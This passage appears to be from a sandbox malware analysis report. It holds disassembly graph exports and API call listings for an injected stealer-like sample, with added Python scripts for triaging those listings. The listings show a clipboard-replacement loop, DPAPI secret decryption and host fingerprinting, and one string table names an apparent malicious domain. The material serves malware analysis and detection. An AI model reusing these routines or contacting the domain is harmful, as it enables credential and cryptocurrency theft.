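# edge list is trimmed so that the excerpt is self-consistent.
SAMPLE = (
    "control_flow_graph 205 2797ba0-2797bca 206 2797bd0-2797c29 205->206 206->206 "
    "207 2797c2b-2797c39 206->207 208 2797c40-2797c70 207->208 208->208 "
    "216 2797d90-2797dce 208->216 216->216 218 2797dd0-2797e2a CoCreateInstance 216->218 "
    "220 27983bb-27983ea call 279e640 GetVolumeInformationW 218->220 "
    "221 2797e30-2797e69 218->221 226 2797f1a-2797f45 SysAllocString 221->226 "
    "233 2797f4b-2797f65 CoSetProxyBlanket 226->233 "
    "282 279835c-2798368 call 2768020 * 2 226->282 233->282 220->282"
)

RANGE_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)$")   # start-end of a basic block
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")               # src->dst block ids


@dataclass
class Block:
    bid: int
    start: int
    end: int
    calls: list = field(default_factory=list)  # internal call targets, as ints
    apis: list = field(default_factory=list)   # named Windows APIs invoked here


def parse_cfg(text):
    """Return ({block id: Block}, [(src, dst), ...]) from one export line."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        tok = toks[i]
        m_edge = EDGE_RE.match(tok)
        m_range = RANGE_RE.match(toks[i + 1]) if i + 1 < len(toks) else None
        if m_edge:
            edges.append((int(m_edge.group(1)), int(m_edge.group(2))))
            i += 1
        elif tok.isdigit() and m_range:
            cur = Block(int(tok), int(m_range.group(1), 16), int(m_range.group(2), 16))
            blocks[cur.bid] = cur
            i += 2
        elif tok == "call" and cur is not None and i + 1 < len(toks):
            target, i = int(toks[i + 1], 16), i + 2
            count = 1
            if i + 1 < len(toks) and toks[i] == "*" and toks[i + 1].isdigit():
                count, i = int(toks[i + 1]), i + 2   # "call X * 2": X is called twice
            cur.calls.extend([target] * count)
        elif cur is not None:
            cur.apis.append(tok)                     # bare identifier: a Windows API name
            i += 1
        else:
            i += 1                                   # stray token before the first block
    return blocks, edges


def api_blocks(blocks):
    """Blocks that invoke named APIs, in address order (the order of the report's APIs list)."""
    return sorted((b for b in blocks.values() if b.apis), key=lambda b: b.start)


def call_counts(blocks):
    """How often each internal routine is called across the whole graph."""
    return Counter(t for b in blocks.values() for t in b.calls)


def successors(edges):
    succ = {}
    for s, d in edges:
        succ.setdefault(s, set()).add(d)
    return succ


def terminal_blocks(blocks, edges):
    """Blocks with no outgoing edge: function exits, or places where the export was cut."""
    succ = successors(edges)
    return sorted(b for b in blocks if b not in succ)


def reachable(blocks, edges, entry):
    """Block ids reachable from entry; anything missing is dead code or a mis-exported block."""
    succ, seen, stack = successors(edges), set(), [entry]
    while stack:
        b = stack.pop()
        if b in seen or b not in blocks:
            continue
        seen.add(b)
        stack.extend(succ.get(b, ()))
    return seen


if __name__ == "__main__":
    blocks, edges = parse_cfg(SAMPLE)
    print(len(blocks), "blocks,", len(edges), "edges")
    for b in api_blocks(blocks):
        print("%07x-%07x  %s" % (b.start, b.end, ", ".join(b.apis)))
    print("internal call counts:", {hex(k): v for k, v in call_counts(blocks).items()})
    print("terminal blocks:", terminal_blocks(blocks, edges))
    print("unreachable:", sorted(set(blocks) - reachable(blocks, edges, 205)))
```

Feeding the parser a whole export line from the report rather than the sample gives the same kind of answer for each function; a block that reports an API but is unreachable from the entry, or a terminal block that does not look like a return, is worth a second look in the disassembly.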

Control-flow Graph
Text export of the IDA plugin graph (block ids 205-305, blocks span 0x2797ba0-0x27984ee): internal calls to 0x279e640, 0x277da20, 0x27681a0, 0x2768010, 0x2768020; Windows API calls in address order: CoCreateInstance (0x2797dd0), SysAllocString (0x2797f1a, 0x2797fa6, 0x2798052), CoSetProxyBlanket (0x2797f4b), VariantInit (0x27980ba), VariantClear (0x279836c), SysFreeString (0x2798387 twice, 0x27983aa), GetVolumeInformationW (0x27983bb).
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(027A268C,00000000,00000001,027A267C,00000000), ref: 02797E22
                                                                              • SysAllocString.OLEAUT32(A719A516), ref: 02797F1F
                                                                              • CoSetProxyBlanket.COMBASE(44FC42A9,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02797F5D
                                                                              • SysAllocString.OLEAUT32(A719A516), ref: 02797FA7
                                                                              • SysAllocString.OLEAUT32(A719A516), ref: 02798053
                                                                              • VariantInit.OLEAUT32(DBDAD9D0), ref: 027980BF
                                                                              • SysFreeString.OLEAUT32(?), ref: 02798391
                                                                              • SysFreeString.OLEAUT32(?), ref: 02798397
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 027983AB
                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,EA02F4D2,00000000,00000000,00000000,00000000), ref: 027983E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
• Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: String$AllocFree$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                              • String ID: EBC@$~%
                                                                              • API String ID: 2247799857-3517279034
                                                                              • Opcode ID: dc9878489313229e02727578310968b8e45f63832644d9e75230d452fcdabd38
                                                                              • Instruction ID: f3670c22c42478866a6646a200e2ada85a3e9ea872c2c00a15349bf23d923e63
                                                                              • Opcode Fuzzy Hash: dc9878489313229e02727578310968b8e45f63832644d9e75230d452fcdabd38
                                                                              • Instruction Fuzzy Hash: 1B322172A483518FE714CF29D88076BBBE1EFC6314F188A2DE9959B391D774D805CB82

Control-flow Graph
Text export of the IDA plugin graph (block ids 429-493, blocks span 0x2782e78-0x27833f1): internal calls to 0x2768010, 0x279fd30, 0x2768020, 0x2780d80, 0x2780810; Windows API calls: RtlExpandEnvironmentStrings (0x2782e8a), GetLogicalDrives (0x2783101).
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?), ref: 02782E9D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
• Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: #A0C$'Q+S$'Y<[$(]`_$*U2W$;E5G$SZ$\E$jY
                                                                              • API String ID: 237503144-3412361877
                                                                              • Opcode ID: 8e1eafd269693140d507ef27daac54dea48caf89035b347da837576f8aeebd44
                                                                              • Instruction ID: 7c51fe5cdf95925bc4659af90ed8a3710d416e5ff387d66c43e58e5afdd30005
                                                                              • Opcode Fuzzy Hash: 8e1eafd269693140d507ef27daac54dea48caf89035b347da837576f8aeebd44
                                                                              • Instruction Fuzzy Hash: FED1DFB55483408FC710AF29D89126BBBE5FFC6724F188E2DE8D58B351E7788901CB86

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • Sleep.KERNELBASE(00000001), ref: 04D01032
                                                                              • OpenClipboard.USER32(00000000), ref: 04D0103C
                                                                              • GetClipboardData.USER32(0000000D), ref: 04D0104C
                                                                              • GlobalLock.KERNEL32(00000000), ref: 04D0105D
                                                                              • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 04D01090
                                                                              • GlobalLock.KERNEL32 ref: 04D010A0
                                                                              • GlobalUnlock.KERNEL32 ref: 04D010C1
                                                                              • EmptyClipboard.USER32 ref: 04D010CB
                                                                              • SetClipboardData.USER32(0000000D), ref: 04D010D6
                                                                              • GlobalFree.KERNEL32 ref: 04D010E3
                                                                              • GlobalUnlock.KERNEL32(?), ref: 04D010ED
                                                                              • CloseClipboard.USER32 ref: 04D010F3
                                                                              • GetClipboardSequenceNumber.USER32 ref: 04D010F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3271938113.0000000004D01000.00000020.00000800.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
• Associated: 00000003.00000002.3271916145.0000000004D00000.00000002.00000800.00020000.00000000.sdmp
• Associated: 00000003.00000002.3271964312.0000000004D02000.00000002.00000800.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_4d00000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                              • String ID:
                                                                              • API String ID: 1416286485-0
                                                                              • Opcode ID: 03f6d21890db35c9d304e1779699a0ddd8b3bd3d61121f9928ed697ccb20a04f
                                                                              • Instruction ID: 08257b8158d52b8c5ad83d002f4fa65f604f95e988cc614ecb5d493faed6efc7
                                                                              • Opcode Fuzzy Hash: 03f6d21890db35c9d304e1779699a0ddd8b3bd3d61121f9928ed697ccb20a04f
                                                                              • Instruction Fuzzy Hash: 7921A1317062609BDB246B71AC0DB6E77E8FF04785F04806CF9C5D7291EA66AC80C6A3
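The APIs list above is the report's per-function record of resolved imports, each with the argument values the analyzer recovered and the code address (`ref`) of the call site. The Python below is an added example, not part of the report or of Joe Sandbox. It parses lines in that format (the two samples are copied from this page: the clipboard routine at 0x04D01032-0x04D010F9 and the CryptUnprotectData call at 0x027758EA), decodes the clipboard format constant 0xD as CF_UNICODETEXT, and applies three simple rules: GetClipboardData followed by EmptyClipboard and SetClipboardData in address order, Sleep together with GetClipboardSequenceNumber in the same routine, and any CryptUnprotectData call. Address order is how the report lists call sites; it approximates but does not prove execution order, so the rules are triage hints, not verdicts.

```python
import re
from collections import namedtuple

# One "• Name.MODULE(args), ref: ADDR" line from a Joe Sandbox APIs list.
ApiCall = namedtuple("ApiCall", "name module args ref")

LINE_RE = re.compile(
    r"^\s*•?\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Copied from this report's APIs lists (clipboard routine in the 0x04D00000 module,
# DPAPI call in the 0x02760000 module).
CLIPBOARD_APIS = """
• Sleep.KERNELBASE(00000001), ref: 04D01032
• OpenClipboard.USER32(00000000), ref: 04D0103C
• GetClipboardData.USER32(0000000D), ref: 04D0104C
• GlobalLock.KERNEL32(00000000), ref: 04D0105D
• GlobalAlloc.KERNEL32(00000002,-00000004), ref: 04D01090
• GlobalLock.KERNEL32 ref: 04D010A0
• GlobalUnlock.KERNEL32 ref: 04D010C1
• EmptyClipboard.USER32 ref: 04D010CB
• SetClipboardData.USER32(0000000D), ref: 04D010D6
• GlobalFree.KERNEL32 ref: 04D010E3
• GlobalUnlock.KERNEL32(?), ref: 04D010ED
• CloseClipboard.USER32 ref: 04D010F3
• GetClipboardSequenceNumber.USER32 ref: 04D010F9
"""
DPAPI_APIS = "• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 027758EA"

# Standard clipboard format ids (winuser.h); the report prints them as hex arguments.
CLIPBOARD_FORMATS = {1: "CF_TEXT", 2: "CF_BITMAP", 8: "CF_DIB", 13: "CF_UNICODETEXT", 15: "CF_HDROP"}


def parse_arg(tok):
    """Hex argument as printed by the report; '?' means the analyzer could not recover it."""
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)   # int() accepts a leading '-' (e.g. -00000004)


def parse_api_list(text):
    """Parse APIs-list lines into ApiCall records sorted by call-site address."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                               # headers and non-API lines
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return sorted(calls, key=lambda c: c.ref)


def clipboard_formats(calls):
    """Names of the formats passed as the first argument of Get/SetClipboardData."""
    out = set()
    for c in calls:
        if c.name in ("GetClipboardData", "SetClipboardData") and c.args and c.args[0] is not None:
            out.add(CLIPBOARD_FORMATS.get(c.args[0], "CF_%#x" % c.args[0]))
    return out


def clipboard_replaces_contents(calls):
    """True when, in address order, the routine reads the clipboard, empties it and writes it back."""
    names = [c.name for c in calls]
    try:
        return names.index("GetClipboardData") < names.index("EmptyClipboard") < names.index("SetClipboardData")
    except ValueError:
        return False


def polls_clipboard(calls):
    """Sleep plus GetClipboardSequenceNumber in one routine suggests a change-polling loop."""
    return {"Sleep", "GetClipboardSequenceNumber"} <= {c.name for c in calls}


def uses_dpapi(calls):
    """CryptUnprotectData is how DPAPI-protected secrets (e.g. browser key material) are decrypted."""
    return any(c.name == "CryptUnprotectData" and c.module == "CRYPT32" for c in calls)


def findings(calls):
    return {
        "clipboard_formats": sorted(clipboard_formats(calls)),
        "clipboard_replace": clipboard_replaces_contents(calls),
        "clipboard_polling": polls_clipboard(calls),
        "dpapi_unprotect": uses_dpapi(calls),
    }


if __name__ == "__main__":
    for label, text in (("clipboard routine", CLIPBOARD_APIS), ("dpapi routine", DPAPI_APIS)):
        calls = parse_api_list(text)
        print(label, "(%d calls):" % len(calls), findings(calls))
```

The same parser runs over every APIs block in the report; adding a rule is a one-line predicate over the sorted call list, and the decoded arguments (here CF_UNICODETEXT, GMEM_MOVEABLE = 0x2 for the GlobalAlloc flags) are what make a hit explainable to a reader of the report.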

Control-flow Graph
Text export of the IDA plugin graph (block ids 518-708, blocks span 0x2775050-0x2778c39): internal calls to 0x2768010, 0x279fba0, 0x2768020, 0x279ffb0, 0x279fee0, 0x2761000, 0x2768cd0, 0x279cca0, 0x2761a70, 0x2761db0, 0x279e640, 0x277ce50; Windows API call: CryptUnprotectData (0x2775894).
                                                                              APIs
                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 027758EA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
• Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: CryptDataUnprotect
                                                                              • String ID: $W#Q$J\$M1IJ$U)QR$V9$ZX^M$g`a$ke
                                                                              • API String ID: 834300711-4063897482
                                                                              • Opcode ID: afcaf4c01fec2214bb501cd1f8c34cd700a45838d44deedd8aa979beb58c61f7
                                                                              • Instruction ID: 154a07f21d45199b1c86c99a9506db3120571857657f82e3bbcf948aaf9f4161
                                                                              • Opcode Fuzzy Hash: afcaf4c01fec2214bb501cd1f8c34cd700a45838d44deedd8aa979beb58c61f7
                                                                              • Instruction Fuzzy Hash: FA5237B19093418BDB25DF24C855BAFB7E2FFC5314F48496CE8998B291E7349805CB93

Control-flow Graph
Text export of the IDA plugin graph (block ids 709-746, blocks span 0x276ddbe-0x276e0fd): internal calls to 0x27697d0, 0x276b870; Windows API call: CoUninitialize (0x276ddbe).
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
• Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: Uninitialize
                                                                              • String ID: +-1'$:!2-$fancywaxxers.shop$gbal$kZ[X$k{$}:
                                                                              • API String ID: 3861434553-2198633159
                                                                              • Opcode ID: a7b1ae6a466766b399f7690918eab394d6a5ab7f39cf90ef54bc91c2bcbc1618
                                                                              • Instruction ID: d3e831118fce4969baf0ce41c0c075c419e903303a802fee97468c44eee54d8d
                                                                              • Opcode Fuzzy Hash: a7b1ae6a466766b399f7690918eab394d6a5ab7f39cf90ef54bc91c2bcbc1618
                                                                              • Instruction Fuzzy Hash: D391E2742187808FD72A8F29C0E4662BFA1FF57300B18969CC9E64F756D7359816CFA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: D$`
                                                                              • API String ID: 0-881360112
                                                                              • Opcode ID: 3a2477d08d458eeaede933dc5b5e4cd37b9afa9357319523f1bfde47b6284203
                                                                              • Instruction ID: 6fe1732504106b32fb4ce6eb9a2a2ddee9f3d5fce354060a5d56e1b08d3bbec5
                                                                              • Opcode Fuzzy Hash: 3a2477d08d458eeaede933dc5b5e4cd37b9afa9357319523f1bfde47b6284203
                                                                              • Instruction Fuzzy Hash: 25331771D083908FDB11CB38C849799BFF1AB46320F0986E9D8A9AB3D2D7758945CB52

                                                                              Control-flow Graph
                                                                              control_flow_graph 1278 2768790-27687a1 call 279c410 1281 27687a7-27687ae call 2795130 1278->1281 1282 2768a2c-2768a2e ExitProcess 1278->1282 1285 2768a27 call 279cbf0 1281->1285 1286 27687b4-27687da GetCurrentProcessId GetCurrentThreadId 1281->1286 1285->1282 1287 27687e0-2768885 SHGetSpecialFolderPathW 1286->1287 1288 27687dc-27687de 1286->1288 1290 2768890-27688d3 1287->1290 1288->1287 1290->1290 1291 27688d5-2768901 call 279b100 1290->1291 1294 2768910-276892c 1291->1294 1295 2768946-276895d GetForegroundWindow 1294->1295 1296 276892e-2768944 1294->1296 1297 2768963-27689ef 1295->1297 1298 27689f1-2768a09 call 2769d30 1295->1298 1296->1294 1297->1298 1301 2768a15-2768a1c 1298->1301 1302 2768a0b call 276cd50 1298->1302 1301->1285 1304 2768a1e-2768a24 call 2768020 1301->1304 1305 2768a10 call 276b840 1302->1305 1304->1285 1305->1301
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32 ref: 027687B4
                                                                              • GetCurrentThreadId.KERNEL32 ref: 027687BE
                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000,?), ref: 02768863
                                                                              • GetForegroundWindow.USER32 ref: 02768955
                                                                              • ExitProcess.KERNEL32 ref: 02768A2E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 4063528623-0
                                                                              • Opcode ID: 33dc20622c36e73fd32f09ac42a7cae0ec7ccdcf87c1143b812b703ce1f4fb8e
                                                                              • Instruction ID: 823df192b9c25474e33b9098927d18b6abc52d254c97a5b2d705cdf32212d192
                                                                              • Opcode Fuzzy Hash: 33dc20622c36e73fd32f09ac42a7cae0ec7ccdcf87c1143b812b703ce1f4fb8e
                                                                              • Instruction Fuzzy Hash: B9514B73B443054FD718AF69CC1D36AB7D79BC4320F0EC53E99859B791DA3898058B82

                                                                              Control-flow Graph
                                                                              control_flow_graph 1309 2792700-27927ec GetSystemMetrics * 2 1315 27927f3-2792cd5 1309->1315
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-3916222277
                                                                              • Opcode ID: 77290c8b0d7ccb8ee1ac81108fd47db9f549f504b0fa58f65b46e869f0043fcf
                                                                              • Instruction ID: 7a8d9fa8ed1e41501d193890b2731aec7a3fa8cf8f4d1464a258fedc605c8d65
                                                                              • Opcode Fuzzy Hash: 77290c8b0d7ccb8ee1ac81108fd47db9f549f504b0fa58f65b46e869f0043fcf
                                                                              • Instruction Fuzzy Hash: 65D15CB02093808FDB34DF66E65879FFBE2BBC5318F519A6DD4985B280D77484588F82
                                                                              APIs
                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0278C1FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                              • String ID:
                                                                              • API String ID: 3960555810-0
                                                                              • Opcode ID: 9886148821e53498758abeca54bb9da236227ce3d6086cfc699dd35a8f4598a5
                                                                              • Instruction ID: 5b6af6037c6b191bbbad728cf0c3efc6ff1e8b8889056be0461052d1f87aa58f
                                                                              • Opcode Fuzzy Hash: 9886148821e53498758abeca54bb9da236227ce3d6086cfc699dd35a8f4598a5
                                                                              • Instruction Fuzzy Hash: E102B1705047828BD71A8F39C490762FBE1AF5B314F28859EC4DA9B792D735A406CB64
                                                                              APIs
                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0278A9A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID:
                                                                              • API String ID: 3545744682-0
                                                                              • Opcode ID: cd2079c03bd74a051166c123acf07ebb9b8da3924e18dc5383dce14aa83a3acf
                                                                              • Instruction ID: a46190ac2a41865ae164202b611cd3b255e842235844006a81c5e0f47ed1774b
                                                                              • Opcode Fuzzy Hash: cd2079c03bd74a051166c123acf07ebb9b8da3924e18dc5383dce14aa83a3acf
                                                                              • Instruction Fuzzy Hash: 60113130605282CBDB198F31C891727BBE2EB8A310F19C89EC09BDB745CB34D802CB20
                                                                              APIs
                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0278A9A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID:
                                                                              • API String ID: 3545744682-0
                                                                              • Opcode ID: 61cb7b54e4a37f96bc7a09cadbd80dbce03a1e2fae850304110620c361c7fd98
                                                                              • Instruction ID: 878df5a18d267391074499eb09945fb7a547fe800b03bfb0714117da8f251ee0
                                                                              • Opcode Fuzzy Hash: 61cb7b54e4a37f96bc7a09cadbd80dbce03a1e2fae850304110620c361c7fd98
                                                                              • Instruction Fuzzy Hash: 581101356452828FDB198F30D891727BBA2EB4A210F19C89ED49BEB745C735E802CB20
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(0279FB7B,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0279CCCE
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                              Control-flow Graph
                                                                              control_flow_graph 1318 278a55f-278a567 1319 278a569-278a56a 1318->1319 1320 278a57b-278a9f9 1318->1320 1321 278a570-278a579 1319->1321 1323 278aa00-278aa5c 1320->1323 1321->1320 1321->1321 1323->1323 1324 278aa5e-278aa63 1323->1324 1325 278aa8d-278aa96 1324->1325 1326 278aa65-278aa72 1324->1326 1328 278aa99-278aad1 GetComputerNameExA 1325->1328 1327 278aa80-278aa89 1326->1327 1327->1327 1329 278aa8b 1327->1329 1329->1328
                                                                              APIs
                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0278AAAC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmp
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmp
